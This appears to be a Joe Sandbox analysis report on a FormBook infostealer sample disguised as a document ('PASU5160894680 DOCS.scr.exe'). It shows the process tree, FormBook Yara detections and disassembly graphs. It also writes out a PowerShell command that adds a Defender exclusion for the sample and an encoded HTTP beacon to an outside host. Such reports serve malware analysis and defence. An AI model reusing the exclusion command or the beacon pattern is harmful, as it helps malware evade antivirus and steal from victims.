                                                              Data Raw: 33 74 56 3d 43 67 50 56 56 72 53 6f 2f 64 57 64 42 4b 43 71 33 54 67 39 50 6b 6b 57 63 31 32 6f 64 51 65 62 64 70 52 57 6b 67 50 73 4d 56 63 74 6c 56 45 52 4a 79 46 48 6f 6e 72 50 37 57 2f 77 73 2b 39 71 54 6a 47 46 48 63 46 41 66 49 55 4f 50 33 74 38 32 72 69 33 4b 66 48 78 48 2f 56 59 50 51 4f 45 6f 32 6a 30 4d 30 43 52 53 54 39 6e 49 62 43 2b 71 66 6d 45 54 44 37 71 64 6c 4f 77 4a 68 45 30 2b 30 79 4f 6e 34 78 6c 50 52 79 39 42 33 30 45 2f 6f 51 44 37 47 68 63 36 38 4f 71 53 54 6d 7a 46 4f 6a 4d 33 47 48 61 4e 77 56 42 76 61 72 71 42 46 64 46 55 50 7a 2b 5a 6b 4f 37 73 59 55 5a 4f 6e 43 43 6a 57 64 38 44 79 39 32 67 49 32 48 4e 4b 2f 71 47 64 4d 75 47 73 56 6e 6e 68 5a 51 63 76 55 6a 4f 4d 59 76 35 53 72 57 4c 68 39 34 66 67 6c 77 65 62 4c 6b 70 58 76 69 61 62 4d 41 72 31 64 2b 61 71 59 48 66 59 78 2f 57 56 37 6e 43 56 30 6f 77 41 44 58 4f 43 74 59 57 66 70 77 48 45 59 7a 4b 48 75 53 5a 46 76 72 61 51 64 64 44 4e 70 79 68 46 45 74 7a 61 61 56 49 36 55 76 66 38 31 31 62 61 51 51 49 61 38 5a 37 31 [TRUNCATED]
                                                              Data Ascii: 3tV=CgPVVrSo/dWdBKCq3Tg9PkkWc12odQebdpRWkgPsMVctlVERJyFHonrP7W/ws+9qTjGFHcFAfIUOP3t82ri3KfHxH/VYPQOEo2j0M0CRST9nIbC+qfmETD7qdlOwJhE0+0yOn4xlPRy9B30E/oQD7Ghc68OqSTmzFOjM3GHaNwVBvarqBFdFUPz+ZkO7sYUZOnCCjWd8Dy92gI2HNK/qGdMuGsVnnhZQcvUjOMYv5SrWLh94fglwebLkpXviabMAr1d+aqYHfYx/WV7nCV0owADXOCtYWfpwHEYzKHuSZFvraQddDNpyhFEtzaaVI6Uvf811baQQIa8Z71l0fYeLwf8FI5MG4GG5k75D/t37MFTnTprbzi+cwihpptGWu79frPzvVnY9BYZdqectF5tRBSCBW1QPU2zQ34QPpT02OvZozEEGX6jvJ4Z6W7jgx5aDrnW4uz3HuRPqOc9vwWROZT+uux94rbAr9DKStF7agsBOg064DtxlBaiVFNpXWeKH7k9utTM51kSZegb0qzUvUnQfFJGwz4iVhaYgF9xugqsbkRifOc90FKcJ1gDPekYALylIrEI17ggC+hkmx31S0/BIceal0phEdawCTCuCFpElKNmQ2CDRECAXeeGCJu+AN0GIPFZqlRozqzwWI5eUV2c9GMmFDNmRofq8KyXU+6A4fZfYETJizzfbXT4gMuXVQlIPNtvg9nBud5viymq5rq4COPmTahXRX0A9i4fGX/9aeLYQLk73G3I/8o7EE4ajie2srFyuF2XcwfxjdkMYp83v4tI/fLMzoC3AH3n90wqkf6OQz4WsVTC58DNeMMQrx9EKSV+AwPyW74CxIST7etlUbUsnHmBGrMS8jZq4ZxzbbLMoxEgsopzs104bLlgwEc8TbqtiJbly98KGzrJ14/+A380yJ1EvKDteo6a+cDP+Jwu1WUk+fMErRBwMkjnVKCGZJqK5XKL7gazh0HElMrAUr4FV/VP/dDznOkxH0BRi6HTE [TRUNCATED]


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              48192.168.2.4497903.33.130.190805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:08:43.369678020 CEST433OUTGET /tni7/?IhkTb=xPfHG0o8kZI8&3tV=Pin1WdfA+NS6cNSxoiNhG1YTVXa1Eh3sPPVbkgnhBmMZ4UpRd1NHllH88EmBo/tJBgeDNt41XaNDTXpF9fqEP/qeQ/p/TwjIkU/ZAha4TiA1Pr+q7OP4Tjw= HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Connection: close
                                                              Host: www.globyglen.info
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:09:04:58
                                                              Start date:12/09/2024
                                                              Path:C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe"
                                                              Imagebase:0xf00000
                                                              File size:730'112 bytes
                                                              MD5 hash:6E3E35E593690A43C0FABE9EC9367B67
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:2
                                                              Start time:09:05:00
                                                              Start date:12/09/2024
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe"
                                                              Imagebase:0xdf0000
                                                              File size:433'152 bytes
                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:3
                                                              Start time:09:05:00
                                                              Start date:12/09/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:4
                                                              Start time:09:05:00
                                                              Start date:12/09/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                              Imagebase:0x9e0000
                                                              File size:2'625'616 bytes
                                                              MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1846811096.0000000004D90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1846811096.0000000004D90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1848370775.0000000006CF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1848370775.0000000006CF0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                              Reputation:moderate
                                                              Has exited:true

                                                              General

                                                              Target ID:5
                                                              Start time:09:05:08
                                                              Start date:12/09/2024
                                                              Path:C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe"
                                                              Imagebase:0xbd0000
                                                              File size:140'800 bytes
                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                              Reputation:high
                                                              Has exited:false

                                                              General

                                                              Target ID:6
                                                              Start time:09:05:10
                                                              Start date:12/09/2024
                                                              Path:C:\Windows\SysWOW64\control.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\SysWOW64\control.exe"
                                                              Imagebase:0xdb0000
                                                              File size:149'504 bytes
                                                              MD5 hash:EBC29AA32C57A54018089CFC9CACAFE8
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4133191097.0000000004910000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4133191097.0000000004910000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4133252340.0000000004960000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4133252340.0000000004960000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              Reputation:moderate
                                                              Has exited:false

                                                              General

                                                              Target ID:10
                                                              Start time:09:05:23
                                                              Start date:12/09/2024
                                                              Path:C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe"
                                                              Imagebase:0xbd0000
                                                              File size:140'800 bytes
                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              General

                                                              Target ID:11
                                                              Start time:09:05:35
                                                              Start date:12/09/2024
                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                              Imagebase:0x7ff6bf500000
                                                              File size:676'768 bytes
                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Disassembly

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:9.1%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:10.3%
                                                                Total number of Nodes:174
                                                                Total number of Limit Nodes:8
                                                                execution_graph 36496 1ab2d38 36499 1ab1e18 36496->36499 36498 1ab2d57 36500 1ab1e23 36499->36500 36502 1855b54 GetModuleHandleW 36500->36502 36503 1858968 GetModuleHandleW 36500->36503 36501 1ab2ddc 36501->36498 36502->36501 36503->36501 36335 158d01c 36336 158d034 36335->36336 36337 158d08e 36336->36337 36342 1a72e48 36336->36342 36347 1a720d8 36336->36347 36352 1a720e8 36336->36352 36357 1a72e58 36336->36357 36343 1a72e85 36342->36343 36344 1a72eb7 36343->36344 36362 1a733c3 36343->36362 36367 1a733e8 36343->36367 36348 1a7210e 36347->36348 36350 1a72e48 2 API calls 36348->36350 36351 1a72e58 2 API calls 36348->36351 36349 1a7212f 36349->36337 36350->36349 36351->36349 36353 1a7210e 36352->36353 36355 1a72e48 2 API calls 36353->36355 36356 1a72e58 2 API calls 36353->36356 36354 1a7212f 36354->36337 36355->36354 36356->36354 36358 1a72e85 36357->36358 36359 1a72eb7 36358->36359 36360 1a733c3 2 API calls 36358->36360 36361 1a733e8 2 API calls 36358->36361 36360->36359 36361->36359 36364 1a733da 36362->36364 36363 1a73488 36363->36344 36372 1a734a0 36364->36372 36375 1a7348f 36364->36375 36368 1a733fc 36367->36368 36370 1a734a0 2 API calls 36368->36370 36371 1a7348f 2 API calls 36368->36371 36369 1a73488 36369->36344 36370->36369 36371->36369 36373 1a734b1 36372->36373 36378 1a74660 36372->36378 36373->36363 36376 1a734b1 36375->36376 36377 1a74660 2 API calls 36375->36377 36376->36363 36377->36376 36382 1a74681 36378->36382 36386 1a74690 36378->36386 36379 1a7467a 36379->36373 36383 1a746d2 36382->36383 36385 1a746d9 36382->36385 36384 1a7472a CallWindowProcW 36383->36384 36383->36385 36384->36385 36385->36379 36387 1a746d2 36386->36387 36389 1a746d9 36386->36389 36388 1a7472a CallWindowProcW 36387->36388 36387->36389 36388->36389 36389->36379 36390 185d580 36391 185d58d 36390->36391 36392 185d5c7 36391->36392 36394 185bde0 36391->36394 36395 185bdeb 36394->36395 36396 185e2d8 36395->36396 36398 185d6e4 36395->36398 36399 185d6ef 36398->36399 36405 1855b54 36399->36405 36401 185e347 36409 1a701b8 36401->36409 36415 1a701a0 36401->36415 36402 185e381 36402->36396 36406 1855b5f 36405->36406 36407 1858c2b 36406->36407 36421 185b2d8 36406->36421 36407->36401 36411 1a702e9 36409->36411 36412 1a701e9 36409->36412 36410 1a701f5 36410->36402 36411->36402 36412->36410 36437 1a71000 36412->36437 36441 1a71010 36412->36441 36417 1a702e9 36415->36417 36418 1a701e9 36415->36418 36416 1a701f5 36416->36402 36417->36402 36418->36416 36419 1a71000 2 API calls 36418->36419 36420 1a71010 2 API calls 36418->36420 36419->36417 36420->36417 36425 185b310 36421->36425 36428 185b2ff 36421->36428 36422 185b2ee 36422->36407 36432 185b3f8 36425->36432 36426 185b31f 36426->36422 36429 185b310 36428->36429 36431 185b3f8 GetModuleHandleW 36429->36431 36430 185b31f 36430->36422 36431->36430 36433 185b43c 36432->36433 36434 185b419 36432->36434 36433->36426 36434->36433 36435 185b640 GetModuleHandleW 36434->36435 36436 185b66d 36435->36436 36436->36426 36438 1a7103b 36437->36438 36439 1a710ea 36438->36439 36445 1a71ed0 36438->36445 36442 1a7103b 36441->36442 36443 1a710ea 36442->36443 36444 1a71ed0 2 API calls 36442->36444 36444->36443 36446 1a71ee1 36445->36446 36450 1a71f25 36446->36450 36454 1a71f30 36446->36454 36451 1a71f98 CreateWindowExW 36450->36451 36453 1a72054 36451->36453 36453->36453 36455 1a71f98 CreateWindowExW 36454->36455 36457 1a72054 36455->36457 36457->36457 36514 185dce0 DuplicateHandle 36515 185dd76 36514->36515 36458 1a77960 36459 1a7798e 36458->36459 36478 1a773bc 36459->36478 36461 1a77a44 36462 1a773bc GetModuleHandleW 36461->36462 36463 1a77a76 36462->36463 36483 1a773cc 36463->36483 36466 1a773cc GetModuleHandleW 36467 1a77ada 36466->36467 36468 1a773bc GetModuleHandleW 36467->36468 36469 1a77b3e 36468->36469 36470 1a773cc GetModuleHandleW 36469->36470 36471 1a77b70 36470->36471 36472 1a773bc GetModuleHandleW 36471->36472 36473 1a77dc8 36472->36473 36474 1a773bc GetModuleHandleW 36473->36474 36475 1a77dfa 36474->36475 36476 1a773bc GetModuleHandleW 36475->36476 36477 1a77e2c 36476->36477 36479 1a773c7 36478->36479 36480 1a7b01b 36479->36480 36481 1855b54 GetModuleHandleW 36479->36481 36487 1858968 36479->36487 36480->36461 36481->36480 36484 1a773d7 36483->36484 36491 1a7764c 36484->36491 36486 1a77aa8 36486->36466 36488 1858978 36487->36488 36489 1858c2b 36488->36489 36490 185b2d8 GetModuleHandleW 36488->36490 36489->36480 36490->36489 36492 1a77657 36491->36492 36493 1a7bec2 36492->36493 36494 1855b54 GetModuleHandleW 36492->36494 36495 1858968 GetModuleHandleW 36492->36495 36493->36486 36494->36493 36495->36493 36504 185da98 36505 185dade GetCurrentProcess 36504->36505 36507 185db30 GetCurrentThread 36505->36507 36508 185db29 36505->36508 36509 185db66 36507->36509 36510 185db6d GetCurrentProcess 36507->36510 36508->36507 36509->36510 36511 185dba3 GetCurrentThreadId 36510->36511 36513 185dbfc 36511->36513 36516 1854668 36517 185467a 36516->36517 36518 1854686 36517->36518 36522 1854779 36517->36522 36527 1854204 36518->36527 36520 18546a5 36523 185479d 36522->36523 36531 1854877 36523->36531 36535 1854888 36523->36535 36528 185420f 36527->36528 36543 1855ad4 36528->36543 36530 1857678 36530->36520 36532 18548af 36531->36532 36534 185498c 36532->36534 36539 18545c8 36532->36539 36536 18548af 36535->36536 36537 18545c8 CreateActCtxA 36536->36537 36538 185498c 36536->36538 36537->36538 36540 1855d18 CreateActCtxA 36539->36540 36542 1855ddb 36540->36542 36544 1855adf 36543->36544 36547 1855af4 36544->36547 36546 1857745 36546->36530 36548 1855aff 36547->36548 36551 1855b24 36548->36551 36550 1857822 36550->36546 36552 1855b2f 36551->36552 36553 1855b54 GetModuleHandleW 36552->36553 36554 1857925 36553->36554 36554->36550

                                                                Executed Functions

                                                                Function 01A77960 Relevance: 6.9, Strings: 3, Instructions: 3170COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 294 1a77960-1a7798c 295 1a77993-1a77ec6 call 1a773bc * 2 call 1a773cc * 2 call 1a773dc call 1a773bc call 1a773cc call 1a773dc call 1a773ec call 1a773fc call 1a773dc call 1a773ec call 1a773dc * 2 call 1a7740c call 1a773dc * 3 call 1a773bc * 3 294->295 296 1a7798e 294->296 394 1a77ee5-1a77ef7 295->394 296->295 395 1a77ef9-1a77f04 394->395 396 1a77ec8-1a77ed4 394->396 399 1a77fbb-1a77fcd 395->399 397 1a77ed6 396->397 398 1a77edb-1a77ee2 396->398 397->398 398->394 400 1a77fd3-1a77fe3 399->400 401 1a77f09-1a77f24 399->401 402 1a780e7-1a780fd 400->402 408 1a77f26-1a77f28 401->408 409 1a77f31-1a77f34 401->409 403 1a78103-1a785d6 call 1a7742c * 6 call 1a773dc call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a7743c call 1a7744c call 1a7745c call 1a7746c 402->403 404 1a77fe8-1a78006 402->404 500 1a785f2 403->500 501 1a785d8-1a785e4 403->501 406 1a7800d-1a78027 404->406 407 1a78008 404->407 415 1a7802e-1a78044 406->415 416 1a78029 406->416 407->406 410 1a77f2f 408->410 411 1a77f2a 408->411 412 1a77f36 409->412 413 1a77f3b-1a77f41 409->413 410->413 411->410 412->413 418 1a77f43 413->418 419 1a77f48-1a77f5b 413->419 420 1a78046 415->420 421 1a7804b-1a7806e call 1a7741c 415->421 416->415 418->419 424 1a77f62-1a77f7c 419->424 425 1a77f5d 419->425 420->421 431 1a78075-1a78085 421->431 432 1a78070 421->432 427 1a77f83-1a77f99 424->427 428 1a77f7e 424->428 425->424 429 1a77fa0-1a77fb8 call 1a7741c 427->429 430 1a77f9b 427->430 428->427 429->399 430->429 435 1a78087 431->435 436 1a7808c-1a780a3 431->436 432->431 435->436 438 1a780a5 436->438 439 1a780aa-1a780bb 436->439 438->439 441 1a780c2-1a780d5 439->441 442 1a780bd 439->442 445 1a780d7 441->445 446 1a780dc-1a780e4 441->446 442->441 445->446 446->402 502 1a785f8-1a7869a 500->502 503 1a785e6-1a785ec 501->503 504 1a785ee 501->504 511 1a786a1-1a7872b 502->511 512 1a7869c 502->512 505 1a785f0 503->505 504->505 505->502 519 1a78747 511->519 520 1a7872d-1a78739 511->520 512->511 521 1a7874d-1a7882e 519->521 522 1a78743 520->522 523 1a7873b-1a78741 520->523 532 1a78839-1a7a850 call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a7743c call 1a7744c call 1a7747c call 1a7745c call 1a7746c call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a7748c call 1a7749c call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a774ac call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a7748c call 1a7749c call 1a774bc call 1a774cc call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a774dc call 1a774ec call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a7748c call 1a7749c call 1a774bc call 1a774cc call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a774dc call 1a774fc call 1a7750c call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a7748c call 1a7749c call 1a774ac call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a7748c call 1a7749c call 1a7751c call 1a774ac call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a7748c call 1a7749c call 1a774ac call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a7748c call 1a7749c call 1a774ac call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a7748c call 1a7749c call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a7752c call 1a7754c call 1a7752c call 1a7754c call 1a7752c call 1a7754c call 1a7752c call 1a7754c call 1a7752c call 1a7754c call 1a7752c call 1a7754c call 1a774ac 521->532 524 1a78745 522->524 523->524 524->521 885 1a7a852-1a7a85e 532->885 886 1a7a87a 532->886 887 1a7a860-1a7a866 885->887 888 1a7a868-1a7a86e 885->888 889 1a7a880-1a7ae88 call 1a7755c call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a7748c call 1a7749c call 1a7756c call 1a7757c call 1a7758c call 1a7759c * 20 886->889 890 1a7a878 887->890 888->890 980 1a7aeb2 889->980 981 1a7ae8a-1a7ae96 889->981 890->889 982 1a7aeb8-1a7afe5 call 1a775ac call 1a775bc call 1a7744c call 1a775cc call 1a775dc call 1a775ec 980->982 983 1a7aea0-1a7aea6 981->983 984 1a7ae98-1a7ae9e 981->984 985 1a7aeb0 983->985 984->985 985->982
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1711343993.0000000001A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1a70000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Pptq$$tq$$tq
                                                                • API String ID: 0-2504848753
                                                                • Opcode ID: 05e39b0b61ac5870b275928d1c6b9d802d91e5673b3460f29973c7827336432a
                                                                • Instruction ID: 283b0c2cf94a6fbb22ab4c29632bb24a7e0b34084dc7ade691588c3f0b7d8456
                                                                • Opcode Fuzzy Hash: 05e39b0b61ac5870b275928d1c6b9d802d91e5673b3460f29973c7827336432a
                                                                • Instruction Fuzzy Hash: 7D73E834A01A598FCB64DF68CC94AAAB7B2FF89301F1155E9D409AB351DB31AEC5CF40
                                                                Function 01A77950 Relevance: 6.8, Strings: 3, Instructions: 3026COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1005 1a77950-1a7798c 1006 1a77993-1a77a29 1005->1006 1007 1a7798e 1005->1007 1015 1a77a33-1a77a3f call 1a773bc 1006->1015 1007->1006 1017 1a77a44-1a77af1 call 1a773bc call 1a773cc * 2 1015->1017 1031 1a77afb-1a77b07 call 1a773dc 1017->1031 1033 1a77b0c-1a77ec6 call 1a773bc call 1a773cc call 1a773dc call 1a773ec call 1a773fc call 1a773dc call 1a773ec call 1a773dc * 2 call 1a7740c call 1a773dc * 3 call 1a773bc * 3 1031->1033 1105 1a77ee5-1a77ef7 1033->1105 1106 1a77ef9-1a77f04 1105->1106 1107 1a77ec8-1a77ed4 1105->1107 1110 1a77fbb-1a77fcd 1106->1110 1108 1a77ed6 1107->1108 1109 1a77edb-1a77ee2 1107->1109 1108->1109 1109->1105 1111 1a77fd3-1a77fe3 1110->1111 1112 1a77f09-1a77f24 1110->1112 1113 1a780e7-1a780fd 1111->1113 1119 1a77f26-1a77f28 1112->1119 1120 1a77f31-1a77f34 1112->1120 1114 1a78103-1a782ed call 1a7742c * 6 call 1a773dc 1113->1114 1115 1a77fe8-1a78006 1113->1115 1181 1a782f8-1a7830c call 1a7743c 1114->1181 1117 1a7800d-1a78027 1115->1117 1118 1a78008 1115->1118 1126 1a7802e-1a78044 1117->1126 1127 1a78029 1117->1127 1118->1117 1121 1a77f2f 1119->1121 1122 1a77f2a 1119->1122 1123 1a77f36 1120->1123 1124 1a77f3b-1a77f41 1120->1124 1121->1124 1122->1121 1123->1124 1129 1a77f43 1124->1129 1130 1a77f48-1a77f5b 1124->1130 1131 1a78046 1126->1131 1132 1a7804b-1a7806e call 1a7741c 1126->1132 1127->1126 1129->1130 1135 1a77f62-1a77f7c 1130->1135 1136 1a77f5d 1130->1136 1131->1132 1142 1a78075-1a78085 1132->1142 1143 1a78070 1132->1143 1138 1a77f83-1a77f99 1135->1138 1139 1a77f7e 1135->1139 1136->1135 1140 1a77fa0-1a77fb8 call 1a7741c 1138->1140 1141 1a77f9b 1138->1141 1139->1138 1140->1110 1141->1140 1146 1a78087 1142->1146 1147 1a7808c-1a780a3 1142->1147 1143->1142 1146->1147 1149 1a780a5 1147->1149 1150 1a780aa-1a780bb 1147->1150 1149->1150 1152 1a780c2-1a780d5 1150->1152 1153 1a780bd 1150->1153 1156 1a780d7 1152->1156 1157 1a780dc-1a780e4 1152->1157 1153->1152 1156->1157 1157->1113 1183 1a78311-1a783c2 call 1a7744c 1181->1183 1188 1a783cc-1a783e6 call 1a7745c 1183->1188 1190 1a783eb-1a785d6 call 1a7746c call 1a7743c call 1a7744c call 1a7745c call 1a7746c 1188->1190 1211 1a785f2 1190->1211 1212 1a785d8-1a785e4 1190->1212 1213 1a785f8-1a78636 1211->1213 1214 1a785e6-1a785ec 1212->1214 1215 1a785ee 1212->1215 1218 1a7863d-1a7865b 1213->1218 1216 1a785f0 1214->1216 1215->1216 1216->1213 1219 1a78666-1a78672 1218->1219 1220 1a7867c-1a78684 1219->1220 1221 1a7868a-1a7869a 1220->1221 1222 1a786a1-1a7872b 1221->1222 1223 1a7869c 1221->1223 1230 1a78747 1222->1230 1231 1a7872d-1a78739 1222->1231 1223->1222 1232 1a7874d-1a78805 1230->1232 1233 1a78743 1231->1233 1234 1a7873b-1a78741 1231->1234 1242 1a78810-1a7882e 1232->1242 1235 1a78745 1233->1235 1234->1235 1235->1232 1243 1a78839-1a7a850 call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a7743c call 1a7744c call 1a7747c call 1a7745c call 1a7746c call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a7748c call 1a7749c call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a774ac call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a7748c call 1a7749c call 1a774bc call 1a774cc call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a774dc call 1a774ec call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a7748c call 1a7749c call 1a774bc call 1a774cc call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a774dc call 1a774fc call 1a7750c call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a7748c call 1a7749c call 1a774ac call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a7748c call 1a7749c call 1a7751c call 1a774ac call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a7748c call 1a7749c call 1a774ac call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a7748c call 1a7749c call 1a774ac call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a7748c call 1a7749c call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a7743c call 1a7744c call 1a7745c call 1a7746c call 1a7752c call 1a7754c call 1a7752c call 1a7754c call 1a7752c call 1a7754c call 1a7752c call 1a7754c call 1a7752c call 1a7754c call 1a7752c call 1a7754c call 1a774ac 1242->1243 1596 1a7a852-1a7a85e 1243->1596 1597 1a7a87a 1243->1597 1598 1a7a860-1a7a866 1596->1598 1599 1a7a868-1a7a86e 1596->1599 1600 1a7a880-1a7ae88 call 1a7755c call 